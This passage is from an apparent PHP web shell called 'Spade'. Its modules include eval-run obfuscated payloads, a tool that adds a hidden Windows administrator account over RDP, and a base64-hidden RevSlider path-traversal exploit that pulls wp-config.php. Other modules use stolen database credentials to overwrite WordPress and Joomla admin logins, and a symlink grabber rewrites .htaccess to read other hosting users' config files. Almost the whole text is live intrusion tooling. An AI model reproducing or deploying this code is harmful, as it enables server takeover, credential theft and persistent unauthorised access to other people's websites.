- $message = "Itu Bukan Zip , , GOBLOK COK";
- }
- $path = dirname(__FILE__).'/';
- $filenoext = basename ($filename, '.zip');
- $filenoext = basename ($filenoext, '.ZIP');
- $targetdir = $path . $filenoext;
- $targetzip = $path . $filename;
- if (is_dir($targetdir)) rmdir_recursive ( $targetdir);
- mkdir($targetdir, 0777);
- if(move_uploaded_file($source, $targetzip)) {
- $zip = new ZipArchive();
- $x = $zip->open($targetzip);
- if ($x === true) {
- $zip->extractTo($targetdir);
- $zip->close();
- unlink($targetzip);
- }
- $message = "<b>Sukses Gan :)</b>";
- } else {
- $message = "<b>Error Gan :(</b>";
- }
- }
- echo '<table style="width:100%" border="1">
- <tr><td><h2>Upload And Unzip</h2><form enctype="multipart/form-data" method="post" action="">
- <label>Zip File : <input type="file" name="zip_file" /></label>
- <input type="submit" name="submit" value="Upload And Unzip" />
- </form>';
- if($message) echo "<p>$message</p>";
- echo "</td><td><h2>Zip Backup</h2><form action='' method='post'><font style='text-decoration: underline;'>Folder:</font><br><input type='text' name='dir' value='$dir' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/spade_backup.zip' style='width: 450px;' height='10'><br><input type='submit' name='backup' value='BackUp!' style='width: 215px;'></form>";
- if($_POST['backup']){
- $save=$_POST['save'];
- function Zip($source, $destination)
- {
- if (extension_loaded('zip') === true)
- {
- if (file_exists($source) === true)
- {
- $zip = new ZipArchive();
- if ($zip->open($destination, ZIPARCHIVE::CREATE) === true)
- {
- $source = realpath($source);
- if (is_dir($source) === true)
- {
- $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source), RecursiveIteratorIterator::SELF_FIRST);
- foreach ($files as $file)
- {
- $file = realpath($file);
- if (is_dir($file) === true)
- {
- $zip->addEmptyDir(str_replace($source . '/', '', $file . '/'));
- }
- else if (is_file($file) === true)
- {
- $zip->addFromString(str_replace($source . '/', '', $file), file_get_contents($file));
- }
- }
- }
- else if (is_file($source) === true)
- {
- $zip->addFromString(basename($source), file_get_contents($source));
- }
- }
- return $zip->close();
- }
- }
- return false;
- }
- Zip($_POST['dir'],$save);
- echo "Done , Save To <b>$save</b>";
- }
- echo "</td><td><h2>Unzip Manual</h2><form action='' method='post'><font style='text-decoration: underline;'>Zip Location:</font><br><input type='text' name='dir' value='$dir/file.zip' style='width: 450px;' height='10'><br><font style='text-decoration: underline;'>Save To:</font><br><input type='text' name='save' value='$dir/spade_unzip' style='width: 450px;' height='10'><br><input type='submit' name='extrak' value='Unzip!' style='width: 215px;'></form>";
- if($_POST['extrak']){
- $save=$_POST['save'];
- $zip = new ZipArchive;
- $res = $zip->open($_POST['dir']);
- if ($res === TRUE) {
- $zip->extractTo($save);
- $zip->close();
- echo 'Succes , Location : <b>'.$save.'</b>';
- } else {
- echo 'Gagal Mas :( Ntahlah !';
- }
- }
- echo '</tr></table>';
- }elseif($_GET['do'] == 'shellchk') {
- echo "<center><h1 class='titulo'>SHELL CHECKER</h1></center><br>";
- eval(str_rot13(gzinflate(str_rot13(base64_decode(('vUddQtswFH1epf4HcCE1VUxbNvEwdSMGd9FeJtGhPaygyLZ5B6jc5AaHORP/fdf5IoXxsBeiSbGdZu491z6+cTiA1GVPdCkwDTIaDnM5lyVupoT5Nc1ymWWmWpZdRm9FXWOGqzguTlue4Utjpa+p53a411OCIcKZFCxqGVUES63F8XGSylAx3jr+oATX45SXE3LBubGwAsM16RLpY5Jlp+aHh1RR8jscWaPZpI0dzbay/hdZJJqkziiFUZV5t5ohSmIE1POy0M+Bl+381rjEL1whj5xmh/kwvC85oifDTp6wqlXyADr2ynAJKJgpiEaeTrCvLaDIA/J0OCD47FswS6Yi85pEzzrYVoNF2ujEg0OX0jJ1duvpWlW+hORmhxQIElNvPuS/inBksxEA98JsNaPjRIiU9civj2FpYL5jhElwWdN8KmUSZ3fm5NNn2pVFMWILSHUuPTFerhbfSYs1Xax+nV2s4u+Xl4slegNI6MckWBxvdmiUx6SRWHUftOXZ5jWmD/Gi9qAUbdMVvKPKP6elKVxA1QayIrWnG3A59y6ibiMjrDMd9OI+9UfcyU9QsvB3W5VwT4eDHam5xc85F8ACd40q3EvfeMxADe3HzatgAcLD58AhwYNoyOxJDvqc5pYhhrOHCO8Y097nXM6vJACLfvCEct6IWaMfGxj5VXOGSwk5Opai4J5n72gj0Wfza+sM+x29+D6bR5eFWaK2xCcCQcELBxy9Y8DbOjFY2nF26JjF88lC3zmYZHEJ8hYkTFaJFtp7j3dpzPvfdKxZKYx9j1CWkFJfuSbvZMzDAf78MRdXgQ724/Oz5cVtR7dA7BK95oW9TvX6id8rrLYhYIaupzSEqntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
- } elseif($_GET['do'] == 'loghunter'){
- echo "<center><h1 class='titulo'>LOG HUNTER</h1></center><br>";
- eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));
- }elseif($_GET['do'] == 'endec'){
- $text = $_POST['code'];
- echo "<center><h1 class='titulo'>SCRIPT ENCODE/DECODE</h1><br>
- <form method='post'><br>
- <textarea placeholder='Enter Text to Encrypt/Decrypt' class='inputz' cols=80 rows=10 name='code'></textarea><br><br>
- <select class='inputz' size='1' name='ope'>
- <option value='urlencode'>url</option>
- <option value='json'>json</option>
- <option value='ur'>convert_uu</option>
- <option value='base64'>Base64</option>
- <option value='url'>base64 - gzinflate - str_rot13 - convert_uu - gzinflate - base64</option>
- <option value='base6416x'>Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64 - Base64</option>
- <option value='coeg'>gzinflate - base64</option>
- <option value='gzinflater'>gzinflate - str_rot13 - base64</option>
- <option value='gzinflatex'>gzinflate - str_rot13 - gzinflate - base64</option>
- <option value='str2'>str_rot13 - base64</option>
- <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
- <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
- <option value='super'>str_rot13 - gzinflate - str_rot13 - base64 - gzinflate - str_rot13 - base64</option>
- <option value='gzpress'>gzcompress - base64</option>
- </select><br> <input class='inputzbut' type='submit' name='submit' value='Encrypt'>
- <input class='inputzbut' type='submit' name='submits' value='Decrypt'>
- </form></center>";
- $submit = $_POST['submit'];
- if (isset($submit)){
- $op = $_POST["ope"];
- switch ($op) {case 'base64': $codi=base64_encode($text);
- break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
- break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
- break;case 'coeg' : $codi=base64_encode(gzdeflate($text));
- break;case 'base6416x' : $codi=base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(($text)))))))))))))))));
- break;case 'super' : $codi=base64_encode(str_rot13(gzdeflate(base64_encode(str_rot13(gzdeflate(str_rot13($text)))))));
- break;case 'urlencode' : $codi=rawurlencode($text);
- break;case 'ur' : $codi=convert_uuencode($text);
- break;case 'json' : $codi=json_encode(utf8_encode($text));
- break;case 'str2' : $codi=base64_encode(str_rot13($text));
- break;case 'gzinflater' : $codi=base64_encode(str_rot13(gzdeflate($text)));
- break;case 'gzinflatex' : $codi=base64_encode(gzdeflate(str_rot13(gzdeflate($text))));
- break;case 'url' : $codi=base64_encode(gzdeflate(convert_uuencode(str_rot13(gzdeflate(base64_encode($text))))));
- break;case 'gzpress' : $codi=base64_encode(gzcompress($text));
- break;default:break;}}
- $submit = $_POST['submits'];
- if(isset($submit)){
- $op = $_POST['ope'];
- switch($op){
- case 'base64': $codi = base64_decode($text);
- break; case 'str' : $codi = str_rot13(gzinflate(str_rot13(base64_decode($text))));
- break; case 'gzinflate' : $codi = str_rot13(gzinflate(base64_decode($text)));
- break; case 'coeg' : $codi = gzinflate(base64_decode($text));
- break; case 'base6416x' : $codi = base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(base64_decode(($text)))))))))))))))));
- break; case 'super' : $codi = str_rot13(gzinflate(str_rot13(base64_decode(gzinflate(str_rot13(base64_decode($text)))))));
- break; case 'urldecode' : $codi = rawurldecode($text);
- break; case 'ur' : $codi = convert_uudecode($text);
- break;case 'json' : $codi=utf8_decode(json_decode($text));
- break;case 'str2' : $codi=str_rot13(base64_decode($text));
- break;case 'gzinflater' : $codi=gzinflate(str_rot13(base64_decode($text)));
- break;case 'gzinflatex' : $codi=gzinflate(str_rot13(gzinflate(base64_decode($text))));
- break;case 'url' : $codi=base64_decode(gzinflate(str_rot13(convert_uudecode(gzinflate(base64_decode(($text)))))));
- break;case 'gzpress' : $codi=gzuncompress(base64_decode($text));
- break;default:break;}}
- $myfile = fopen("x.txt", "w") or die("Unable to open file!");
- fwrite($myfile, $codi);
- fclose($myfile);
- echo "<center><div id='kotakan'><br>
- <a href='x.txt' target='blank_'>[ R E S U L T ]</a></div><br>";
- }elseif($_GET['do'] == 'krdp2') {
- if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
- echo "<center><h1 class='titulo'>K-RDP V.2 SHELL</h1></center><br>";
- echo "<center>STATUS<br>$status_work</center><br><br><div id='result'>
- <center><form action='' method='post'>
- <input type='text' name='username' placeholder='Username' value='spade'>
- <input type='text' name='password' placeholder='Password' value='spade'>
- <input type='submit' name='shc_krdp' value='Submit'>
- </form></center>
- <pre>";
- if($_POST['shc_krdp']){
- echo "<center>";
- $krdp_user = $_POST['username'];
- $krdp_password = $_POST['password'];
- $cmd_cek_user = shell_exec('net user');
- if(preg_match($krdp_user,$cmd_cek_user)){
- echo "$krdp_user already available";
- }else {
- $admin_list = array(
- 'Administrators',
- 'Administrator',
- 'Administrateur',
- 'admins',
- 'sadmin',
- 'Administrador',
- 'admin',
- );
- if(shell_exec('net user $krdp_user $krdp_password /add')){
- echo "[+] USER : <font color=lime>$krdp_user | $krdp_password</font><br>";
- foreach ($admin_list as $key => $admins_list) {
- if(shell_exec('net localgroup $admins_list $r_user /add')){
- echo "[+] localgroup : <font color=lime>$admins_list</font><br>";
- }else{
- echo "[+] <font color=red>Errors On localgroup $admins_list</font><br>";
- }
- }echo "[INFO] Connect to IP Computer (RDP) <font color=lime>".$s_server_ip."</font><br>";
- echo '<hr>[NET USER INFO]<br>'.shell_exec('net user');
- }else{
- echo "[+] Username : <font color=red>$krdp_user </font>| Password : <font color=red>$krdp_password , Failed to Add</font><br>";
- }
- }
- }
- echo"</pre>
- </div></center>";
- }else{ echo "<font color='red'>This Feature Supports Window Server Only!</font>";}
- }elseif($_GET['do'] == 'revs'){
- eval(base64_decode("ZWNobyAnPGNlbnRlcj48aDEgY2xhc3M9InRpdHVsbyI+U1BBREUgV1AgQ09ORklHIEdSQUJCRVI8L2gxPjxicj4KICAgIDxwMT5CZSBNaW5kZnVsbCB0aGF0IHRvIHN1Ym1pdCBhIFZhbGlkIFVSTCB3aXRoIDxmb250IGNvbG9yPSJyZWQiPmh0dHA6Ly88L2ZvbnQ+IGFuZCA8Zm9udCBjb2xvcj0icmVkIj4vPC9mb250PiE8YnI+PGk+ZWc6IGh0dHA6Ly93ZWJzaXRlLmNvbS8gPC9pPjxicj48Yj5ET1JLOiA8YSBocmVmPSJodHRwczovL3d3dy5nb29nbGUuY29tLyNxPXJldnNsaWRlci5waHArJTIySW5kZXgrb2YlMjIiIHRhcmdldD0iX0JMQU5LIj5yZXZzbGlkZXIucGhwICJJbmRleCBPZiI8L2E+PC9iPjwvcDE+PGJyPgogICAgICAgIDxmb3JtIG1ldGhvZD0iUE9TVCI+CiAgICAgICAgICAgIDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJsaW5rIiBwbGFjZWhvbGRlcj0iaHR0cHM6Ly93b3JkcHJlc3MuY29tLyIgcmVxdWlyZWQ+PGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdldCBDb25maWciLz4KICAgICAgICA8L2Zvcm0+JzsKICAgICAgICAKICAgICAgICAgICAgaWYoaXNzZXQoJF9QT1NUWydsaW5rJ10pICYmICghZW1wdHkoJF9QT1NUWydsaW5rJ10pKSl7CiAgICAgICAgICAgICAgICAkbGkgPSAkX1BPU1RbJ2xpbmsnXTsKICAgICAgICAgICAgICAgIGVjaG8gIjxmb250IGNvbG9yPSdibHVlJz5TYW5pdGl6aW5nIFN0cmluZyAuIC4gLiAuIDwvZm9udD48L2JyPiI7CiAgICAgICAgICAgICAgICBzbGVlcCgyKTsgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICRsaW4gPSBodG1sc3BlY2lhbGNoYXJzKCRsaSk7CiAgICAgICAgICAgICAgICAkbGluayA9IGZpbHRlcl92YXIoJGxpbiwgRklMVEVSX1NBTklUSVpFX1NUUklORyk7CiAgICAgICAgICAgICAgICBlY2hvICI8Zm9udCBjb2xvcj0nZ3JlZW4nPlNhbml0YXppb24gU3VjY2VzczwvZm9udD48L2JyPiI7CiAgICAgICAgICAgICAgICBlY2hvICI8Zm9udCBjb2xvcj0nYmx1ZSc+VmFsaWRhdGluZyBVUkwgLiAuIC4gLjwvZm9udD48L2JyPiI7CiAgICAgICAgICAgICAgICBzbGVlcCgzKTsKCiAgICAgICAgICAgICAgICBpZiAoIXByZWdfbWF0Y2goIi9cYig/Oig/Omh0dHBzP3xmdHB8aHR0cD8pOlwvXC98d3d3XC4pWy1hLXowLTkrJkAjXC8lPz1+X3whOiwuO10qWy1hLXowLTkrJkAjXC8lPX5ffF0vaSIsJGxpbmspKSB7CiAgICAgICAgICAgICAgICAgICAgZWNobyAiPGZvbnQgY29sb3I9J3JlZCc+U3RyaW5nIGlzIG5vdCBhIFVSTCEhPC9mb250PiwgfiBUcnkgQWdhaW4gTGF0ZXIhPC9icj4iOwogICAgICAgICAgICAgICAgICAgIGVjaG8gIlN0cmluZzogIi4kbGluazsKICAgICAgICAgICAgICAgICAgICBleGl0KCk7CiAgICAgICAgICAgICAgICB9ZWxzZXsKICAgICAgICAgICAgICAgICAgICBlY2hvICI8Zm9udCBjb2xvcj0nZ3JlZW4nPlVSTCBWYWxpZGF0ZWQgU3VjY2Vzc2Z1bGx5LiAuIC4gLjwvZm9udD48YnIvPiI7CiAgICAgICAgICAgICAgICAgICAgZWNobyAiPGZvbnQgY29sb3I9J2JsdWUnPkRvd25sb2FkaW5nIFdQLUNvbmZpZyEuIC4gLiAuPC9mb250Pjxici8+IjsKICAgICAgICAgICAgICAgICAgICBzbGVlcCgyKTsKICAgICAgICAgICAgICAgICAgICAvL0l0IHdpbGwgZG93bmxvYWRlZCBkaXJlY3RseSBpZiBpdHMgVnVsbiBmb3IgUmV2c2xpZGVyIEV4cGxvaXQKICAgICAgICAgICAgICAgICAgICAkd3Bjb25maWcgPSAkbGluay4id3AtYWRtaW4vYWRtaW4tYWpheC5waHA/YWN0aW9uPXJldnNsaWRlcl9zaG93X2ltYWdlJmltZz0uLi93cC1jb25maWcucGhwIjsKICAgICAgICAgICAgICAgICAgICBlY2hvICI8YSBocmVmPSciLiR3cGNvbmZpZy4iJyB0YXJnZXQ9J19CTEFOSycgPkRvd25sb2FkIFdQLUNvbmZpZzwvYT4iOwogICAgICAgICAgICAgICAgICAgIGVjaG8gIjxzY3JpcHQ+d2luZG93Lm9wZW4oJyIuJHdwY29uZmlnLiInKTwvc2NyaXB0PjwvY2VudGVyPiI7CiAgICAgICAgICAgICAgICB9ICAgICAgIAoKCiAgICAgICAgICAgIH0="));
- }elseif($_GET['do'] == 'about') {
- echo "<script>function copy(text) { window.prompt('Copy to clipboard: Ctrl+C, Enter', text); }</script><center><font color='lime'><pre>
- ___ ___ ___ ___
- / /\ ___ / /\ / /\ / /\
- / /::\ / /\ / /::\ / /::\ / /::\
- /__/:/\:\ / /::\ / /:/\:\ / /:/\:\ / /:/\:\
- _\_ \:\ \:\ / /:/\:\ / /::\ \:\ / /:/ \:\ / /::\ \:\
- /__/\ \:\ \:\ / /::\ \:\ /__/:/\:\_\:\ /__/:/ \__\:| /__/:/\:\ \:\
- \ \:\ \:\_\/ /__/:/\:\_\:\ \__\/ \:\/:/ \ \:\ / /:/ \ \:\ \:\_\/
- \ \:\_\:\ \__\/ \:\/:/ \__\::/ \ \:\ /:/ \ \:\ \:\
- \ \:\/:/ \ \::/ / /:/ \ \:\/:/ \ \:\_\/
- \ \::/ \__\/ /__/:/ \__\::/ \ \:\
- \__\/ \__\/ ~~ \__\/
- </pre></font><p1>Special Greets to: <a class='wenk' href='https://www.facebook.com/indoxploit/' target='_BLANK'>IndoXploit</a> | <a class='wenk' href='https://www.facebook.com/AnonGhostTeamOfficial/' target='_BLANK'>An0nGh0st Team</a> | <a class='wenk' href='https://www.facebook.com/SpadePiratesOfficial/' target='_BLANK'>Spade Pirates</a> | <a href='https://www.facebook.com/PureHackers.Sec/' class='wenk' target='_BLANK'>PureHackers International</a> | <a class='wenk' href='https://www.facebook.com/lagunagov.ph/' target='_BLANK'>Anonymous Laguna</a></p1><br><p1>We Are: <a class='wenk' href='https://fb.com/Meowertsz' target='_BLANK'>Spade</a> | <a class='wenk' href='https://fb.com/yin.lalican' target='_BLANK'>Jok3r</a> | <a class='wenk' href='https://fb.com/AnonymousM3' target='_BLANK'>Arcangel</a> | <a class='wenk' href='https://fb.com/vince.sombrero' target='_BLANK'>B74ck C4p</a><br><a color='red' onclick='copy(\"5p4d3@protonmail.com\")'>Report a bug</a><br></p1><form method=post><input type=submit value='Install Spade Hackbar Mod' name='hackbar'></form>";
- if(isset($_POST['hackbar'])){
- if(strlen(strstr($_SERVER['HTTP_USER_AGENT'],"Firefox")) <= 0 ){
- // if not firefox
- echo "<font color=red>You need to Download/Install Firefox to Install this Addon<br>";
- echo "Your Browser: " . $_SERVER['HTTP_USER_AGENT']."</font>";
- }else{
- echo '<meta http-equiv="refresh" content="0; URL=http://www.kindergarden-xuzhou.com/public/spade.xpi">';
- }
- }
- echo "</center>";
- } elseif($_GET['do'] == 'auto_cu_wp') {
- if($_POST['gass']) {
- echo "<center><h1 class='titulo'>WordPress Auto Change User 2</h1>
- <form method='post'>
- Link Config: <br>
- <textarea name='link' style='width: 450px; height:250px;'>";
- UrlLoop($_POST['linkconf'],'wordpress');
- echo"</textarea><br>
- <input type='submit' style='width: 450px;' name='auto_cu_wp' value='Submit'>
- </form></center>";
- } else {
- echo "<center><h1 class='titulo'>WordPress Auto Change User 2</h1>
- <form method='post'>
- Link Config: <br>
- <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/spade_sym/'><br>
- <input type='submit' style='width: 450px;' name='gass' value='Submit'>
- </form></center>";
- }
- if($_POST['auto_cu_wp']) {
- function anucurl($sites) {
- $ch = curl_init($sites);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION,true);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- $link = explode("\r\n", $_POST['link']);
- $user = "spade";
- $pass = "spade";
- $passx = md5($pass);
- foreach($link as $dir_config) {
- $config = anucurl($dir_config);
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- echo "[-] <font color=red>error, can not take its domain name</font><br>";
- } else {
- echo "<font color=blue>[</font> $target <font color=blue>]</font></font><br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
- if(!$conn OR !$db OR !$update) {
- echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
- mysql_close($conn);
- } else {
- echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
- echo "[+] username: <font color=lime>$user</font><br>";
- echo "[+] password: <font color=lime>$pass</font><br><br>";
- mysql_close($conn);
- }
- }
- }
- }elseif($_GET['do'] == 'auto_cu_joomla') {
- if($_POST['gass']) {
- echo "<center><h1 class='titulo'>Joomla Auto Change User 2</h1>
- <form method='post'>
- Link Config: <br>
- <textarea name='link' style='width: 450px; height:250px;'>";
- UrlLoop($_POST['linkconf'],'joomla');
- echo"</textarea><br>
- <input type='submit' style='width: 450px;' name='auto_cu_joomla' value='Hajar!!'>
- </form></center>";
- } else {
- echo "<center><h1 class='titulo'>Joomla Auto Change User 2</h1>
- <form method='post'>
- Link Config: <br>
- <input type='text' name='linkconf' height='10' size='50' placeholder='http://link.com/spade_sym/'><br>
- <input type='submit' style='width: 450px;' name='gass' value='Submit!!'>
- </form></center>";
- }
- if($_POST['auto_cu_joomla']) {
- function anucurl($sites) {
- $ch = curl_init($sites);
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
- curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
- curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
- curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
- curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
- curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
- curl_setopt($ch, CURLOPT_COOKIESESSION,true);
- $data = curl_exec($ch);
- curl_close($ch);
- return $data;
- }
- $link = explode("\r\n", $_POST['link']);
- $user = "spade";
- $pass = "spade";
- $passx = md5($pass);
- foreach($link as $dir_config) {
- $config = anucurl($dir_config);
- $dbhost = ambilkata($config,"host = '","'");
- $dbuser = ambilkata($config,"user = '","'");
- $dbpass = ambilkata($config,"password = '","'");
- $dbname = ambilkata($config,"db = '","'");
- $dbprefix = ambilkata($config,"dbprefix = '","'");
- $prefix = $dbprefix."users";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result['id'];
- $site = ambilkata($config,"sitename = '","'");
- $update = mysql_query("UPDATE $prefix SET username='$user',password='$passx' WHERE id='$id'");
- echo "Config => ".$dir_config."<br>";
- echo "CMS => Joomla<br>";
- if($site == '') {
- echo "Sitename => <font color=red>error, could not get its domain name</font><br>";
- } else {
- echo "Sitename => $site<br>";
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=red>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => Done , Username : <font color=lime>$user</font> Password : <font color=lime>$pass</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- }elseif($_GET['do'] == 'symconfig') {
- if(strtolower(substr(PHP_OS, 0, 3)) == 'win'){
- echo "<font color='red'>This feature is Not Windows Server!</font>";
- echo '<script>alert("Skid this won\'t work on Windows")</script>';
- exit;
- }else{
- echo "<center><h1 class='titulo'>SYM/CONFIG 2</h1></center><br>";
- if($_POST["m"] && !$_POST["passwd"]==""){
- @mkdir("spade_sym", 0777);
- @chdir("spade_sym");
- @symlink("/","root");
- $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex spade.htm\nAddType text/plain .php\nAddHandler text/plain .php\nSatisfy Any";
- @file_put_contents(".htaccess",$htaccess);
- $etc_passwd=$_POST["passwd"];
- $etc_passwd=explode("\n",$etc_passwd);
- foreach($etc_passwd as $passwd){
- $pawd=explode(":",$passwd);
- $user =$pawd[0];
- @symlink('/','spade_sym/root');
- @symlink('/home/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
- @symlink('/home/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
- @symlink('/home/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
- @symlink('/home/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
- @symlink('/home/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
- @symlink('/home/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
